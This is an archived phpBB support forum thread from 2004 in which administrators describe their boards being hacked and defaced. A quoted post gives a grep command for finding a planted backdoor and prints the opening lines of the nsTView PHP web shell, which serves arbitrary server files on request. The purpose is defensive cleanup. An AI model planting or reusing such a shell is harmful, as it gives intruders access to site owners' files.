Forum Hacked by someone

This is an archive of the phpBB 2.0.x support forum. Support for phpBB2 has now ended.
Forum rules
Following phpBB2's EoL, this forum is now archived for reference purposes only.
Please see the following announcement for more information: viewtopic.php?f=14&t=1385785
Locked
deef
Registered User
Posts: 10
Joined: Fri May 23, 2003 1:26 pm
Location: Belgium
Contact:

Post by deef »

mp24 wrote: @ Techie-Micheal:

Until this morning. Someone exploited the highlight bug, although we had fixed it to what it says here: http://www.phpbb.com/security/final_reports.php?p=1 .


Same problem I had a worked version 2.0.11 Got hacked today.... let my provider set my site back (Provider is combell.com).

Read this bug... and got in version 2.0.11 also this bug....

I hope is solved now.... otherwise I do not know wath I must do...
I have read today 10 pages of this topic.... i'm tyred of reading .... checked all my files and directorys... checked whole my configuration but I cannot find anything weird....

The only thing I do not know where to find is the log...

(but my site is working for now... but for how long ?)
Image

deef
Registered User
Posts: 10
Joined: Fri May 23, 2003 1:26 pm
Location: Belgium
Contact:

Re: Ferror Crew, YOU GOT ME.... great job

Post by deef »

Techie-Micheal wrote:
deef wrote:Or must I ask at the "Ferror Crew" for a solution ? :oops: :?:
That was not called-for ...


Sorry, ment not to be rude it was only for joking... At the beginning of the hacking history (today for me) I found it plesant....

But now I have pain at my ass, eyes and neck from reading this topic.... now I'm angry... I don't understand those people...

I want to apoligize....
Image

seifenkiste
Registered User
Posts: 48
Joined: Sat Nov 09, 2002 9:21 pm
Location: Italy

Post by seifenkiste »

my forum has been working 12 hours without hacking today, let's see for how long.

Moderators: what about making a short topic with the most important suggestions (take them from this topic) to not get hacked? And maybe sending a mass email to all your users if something so big is getting public? I know 100.000 users are a lot, but they are also the main strenght of phpbb. Not everybody has the time of checking this forum every day, except hackers.

User avatar
Techie-Micheal
Security Consultant
Posts: 19511
Joined: Sun Oct 14, 2001 12:11 am
Location: In your servers

Post by Techie-Micheal »

seifenkiste wrote: my forum has been working 12 hours without hacking today, let's see for how long.

Moderators: what about making a short topic with the most important suggestions (take them from this topic) to not get hacked? And maybe sending a mass email to all your users if something so big is getting public? I know 100.000 users are a lot, but they are also the main strenght of phpbb. Not everybody has the time of checking this forum every day, except hackers.
I've been considering a sticky to summarize the points, what to do, etc. As for mass mailing, there is discussion going on about a mailing list.
Proven Offensive Security Expertise. OSCP - GXPN

deef
Registered User
Posts: 10
Joined: Fri May 23, 2003 1:26 pm
Location: Belgium
Contact:

Post by deef »

Techie-Micheal wrote: [ I've been considering a sticky to summarize the points, what to do, etc. As for mass mailing, there is discussion going on about a mailing list.


This good... I'm meber on a lot of boards who sends weekly mass mails... this is not good because members do not reed them annymore...

I vote for NOT sending mass-mails.... However on this topic the techie team (or moderators) MUST take their responsibility and send a mass mail (use a different layout than the normal massmails who we don't read because we think they are junk mail)
And give a link to the new topic summary...
Image

idav
Registered User
Posts: 4
Joined: Thu Dec 09, 2004 1:38 pm
Location: Kingsport, Tennessee
Contact:

HACKED- FORUM OWNED BY XXSCXX- Help!

Post by idav »

Wow. What a way to start the day trying to chase down a hack!

We run a popular musician forum in Northeast Tennessee that has 900 users. We had well over 30,000 threads and have stable since 2002.

Last night, a hacker came in and eliminated all of our threads...
A message was also sent out to our users that stated...
GOTRICITIES HAS BEEN OWNED!!

YOUR FORUM HAS BEEN OWNED BY XxScxX

I'm in dire need of some suggestions. We're trying to restore from a backup, but I sure would appreciate any insight into this problem, how it happened and what we can do to prevent this.

Any time would be greatly appreciated!

David
Last edited by idav on Fri Dec 10, 2004 1:43 am, edited 1 time in total.

Dark
Registered User
Posts: 190
Joined: Sat Jan 12, 2002 9:44 pm
Location: Alberta, Canada
Contact:

Post by Dark »

Upgrade to 2.0.11 and as to restoring it, i suggest if there are no mods just reupload everything and restore the SQL from a backup.

Alberrisford
Registered User
Posts: 37
Joined: Sun Aug 25, 2002 6:25 pm

Post by Alberrisford »

My forums were hacked yesterday :( . I didn't realise about the fix, luckily no damage seems to have been done. Just the main index page and the /forums index page were changed, nothing else seems to be affected. I am just in the process of upgrading to 2.0.11.

Does anyone know of anything else I can do to make sure everything else is ok and it won't happen again? The server it's hosted on is not mine, it's operated by 1&1 (...dont get me started!). Someone mentioned that they could have created a backdoor for themselves to get in next time, is this possible?

Thanks a lot

seifenkiste
Registered User
Posts: 48
Joined: Sat Nov 09, 2002 9:21 pm
Location: Italy

Post by seifenkiste »

Alberrisford wrote: Someone mentioned that they could have created a backdoor for themselves to get in next time, is this possible?

Thanks a lot


yes, it is possible. See the post on page 10 in this thread where it is explained which words you should look for to find the backdoor file.

seifenkiste
Registered User
Posts: 48
Joined: Sat Nov 09, 2002 9:21 pm
Location: Italy

Post by seifenkiste »

I mean this one:

The Bad Astronomer wrote: OK then, that's gotta be it, at least in some cases.

If your board is under this attack, then you must look for that file. What's going on is that the hacker is using it to change files on your site.

The file can be named anything. In my case, it was newsletter.php, which was pretty evil, because I have several newsletter files [edited to add: I didn't even find the file: my webhost, BlueVirtual, found it when I enlisted their help]. I also found an identical file named functions_topic.php. I downloaded (but didn't install) the entire phpBB 2.0.11 file structure to check, and saw no files named newsletter.php or functions_topic.php, so I knew I had it.

You can find the files if you have direct access to them via a shell. Once I found one of the files, I searched in it for a line that was unique enough to distinguish it from other files. By searching all my files for that line, I was able to find the second copy.

If you have shell access to your files, then go to your top html directory (not just your top phpBB directory!), and type this:
grep -R eregi * | grep unix


This will search through all your directories, going through the files and looking for the word "eregi"; then when it finds it it looks for the word "unix" (since "eregi" appears in legitimate files, looking for "unix" nails it).

Any file you find doing this is likely to be the backdoor file. If you find any files, then look at the first few lines. Here is what the evil file's first lines look like:
<?
@set_time_limit(0);
if($_GET[download]){
header("Content-disposition: attachment; filename=\"$download\";");
readfile("$d/$download");
exit;}
$images=array(".gif",".jpg",".png",".bmp");
$whereme=getcwd();
$d=$_GET[d];
#############
$ver= "v1.1";
#############
$copyr = "<center><a href=http://nst.e-nex.com target=_blank>nsTView $ver<br>o... Network security team ...o</a>";
$php_self=$_SERVER[PHP_SELF];
if(@eregi("/",$whereme)){$os="unix";}else{$os="win";}


If you see this, then delete the file! It's allowing the hacker access to your files. If you feel uncomfortable deleting it, then send it to Graham or one of the other admins for confirmation.

If you don't have shell access to your files, then maybe you can gzip them up, transfer them to your home computer and look at them there. Use the "search" function to look through them for those words.

Note: just upgrading to 2.0.11 will not solve your problem if you still have copies of this file on your system!

I cleaned off my files yesterday, and have not had any problems since. I upgraded to 2.0.11 and changed my passwords, just to be safe. I suggest you do too.

Finally, I'll note that this may not be everyone's problem, but it was certainly mine, and it looks like EternalOne's as well. So maybe this will help some folks.

Dark Side
Registered User
Posts: 21
Joined: Sun Jun 13, 2004 1:08 am
Location: Southeast, U.S.

Weird "DEBUG' Error now

Post by Dark Side »

I did the upgrade to my club's forums earlier (no evidence of hacking) and have now started seeing this strange message sometimes when navigating the pages of the forum. Not all the time, mind you....just intermittently. Any clues?
Warning: odbc_exec(): SQL error: [Microsoft][ODBC Microsoft Access Driver] The search key was not found in any record., SQL state S1000 in SQLExecDirect in d:\html\users\caos4x4com\html\boards\db\msaccess.php on line 176
phpBB : Critical Error

Error clearing sessions table

DEBUG MODE

SQL Error : Error

DELETE FROM phpbb_sessions WHERE session_time < 1102626068 AND session_id <> '809d0e17f676a2152de986b56e5cf449'

Line : 302
File : d:\html\users\caos4x4com\html\boards\includes\sessions.php


We were wanting to convert the access database to MySQL because our membership is growing faster than expected but, not until this error message is resolved first. No sense in converting one problem into another. Still have to find a way to convert it too. :?:

I apologize if this is in the wrong forum but considering it had to do with the upgrade...I tried here first.
Dark Side

JoelSherrill
Registered User
Posts: 7
Joined: Thu Dec 09, 2004 9:50 pm
Contact:

Yet Another Site Hacked

Post by JoelSherrill »

I know I am not alone in reporting this but wanted to share my pain with someone. elviscostellofans.com was running 2.0.10 and got throughly hacked on Nov 27. They installed phpshell and changed all passwords. I assume they destroyed the database. We were hosted by hostmatix.com and their support has been as pitiful as the others reported. I now have 5 inquiries to reset to the password and check on the DB and last backup. They have never responded. I got one comment that their backup would be 30 days old. For that, we paid a hosting company.

That has driven me to get a static IP from my cable provider and rehost the site on a Linux machine in my house. At least I can touch it myself and keep better backups. We ended up restoring from a September backup and are up temporarily at http://ecfans.dyndns.org/phpBB2

We are now running 2.0.11 which was installed from the tar ball with a few local mods. Some have reported that there is still a possible hole in 2.0.11. Is there really or is it a side-effect of an incomplete update?

Enough whining. I really hope to contribute some in the near future. I like this package. :)

--joel sherrill

idav
Registered User
Posts: 4
Joined: Thu Dec 09, 2004 1:38 pm
Location: Kingsport, Tennessee
Contact:

OWNED! BY XxSCxX :: Official Sites

Post by idav »

This detail is related to our search for the individuals that hacked our site.

Whomever attacked ours sent a mass mail to all 900 users that stated our web site GOTRICITIES.COM HAS BEEN OWNED!!!

The email and signature on the forum threads stated...

YOUR FORUM HAS BEEN OWNED BY XxScxX

Looking this up on Google
http://www.google.com/search?q=XxScxX&ie=UTF-8&oe=UTF-8

brings back..
http://forums.inscriber.com/Register.php

Not sure if this is related. Could be just a trophy list. I have contacted the support threads at inscriber.com to see if they can help.

idav

JoelSherrill
Registered User
Posts: 7
Joined: Thu Dec 09, 2004 9:50 pm
Contact:

Post by JoelSherrill »

We didn't get a mass mailing but only a partially uploaded and renamed copy of phpshell. The defamed index.php produced a page with EGY_HACKMAN@YAHOO.COM and some incorrectly spelled anti-semitic ranting.

SimonEast
Registered User
Posts: 9
Joined: Thu Aug 05, 2004 8:50 am

Post by SimonEast »

Removed by moderator, per user request - Techie-Micheal

Locked

Return to “2.0.x Support Forum”